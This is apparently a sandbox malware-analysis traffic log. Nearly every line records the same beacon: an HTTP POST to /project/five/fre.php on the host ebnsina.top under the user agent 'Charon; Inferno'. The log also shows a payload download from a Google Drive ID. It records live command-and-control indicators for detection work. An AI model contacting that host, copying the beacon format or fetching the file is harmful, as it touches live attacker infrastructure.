Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 149Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: unknown

HTTP traffic detected: POST /project/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ebnsina.topAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C8BF7604Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:37:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2nfHcAlrHEG%2FmW88PiiTIHkgmoPSyTjOGh1r7c%2FfnqlSZraYRuC2cydERUW9JuKrF4WDDCHzsd4fzB%2B9yU5QzxhpxAMfgzXUcc0Y%2BJCWNzvb%2FsIQgbAQYEg%2BQ1l6kA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65cfac81fdaf5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
